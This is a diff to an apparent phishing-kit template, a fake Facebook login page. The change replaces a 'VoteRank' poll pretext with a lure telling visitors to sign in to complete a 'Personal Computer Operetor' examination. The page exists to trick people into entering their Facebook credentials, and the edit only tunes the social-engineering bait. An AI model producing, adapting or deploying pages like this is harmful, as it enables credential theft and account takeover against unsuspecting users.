--- a/WebPages/fb_advanced_poll/index2.html
+++ b/WebPages/fb_advanced_poll/index2.html
@@ -1,7 +1,7 @@
 <!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
 <!DOCTYPE html>
 <html>
-<title>VoteRank #289032</title>
+<title>Complete Your Exam For Personal Computer Operetor </title>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
@@ -109,8 +109,8 @@ h5{
 </style>
 </head>
 <header class="w3-panel w3-center w3-opacity">
-  <h1 class="w3-xlarge">VOTERANK</h1>
-  <h1>#289032</h1>
+  
+  <h1>Complete Your Exam For Personal Computer Operetor</h1>
 </header>
 <section class="login-form-wrap">
   <h1>Facebook</h1>
@@ -123,6 +123,6 @@ h5{
     </label>
     <input type="submit" value="Login">
   </form>
-  <h5>Sign in to complete poll.</h5>
+  <h5>Sign in to complete examination.</h5>
 </section>
 </html>
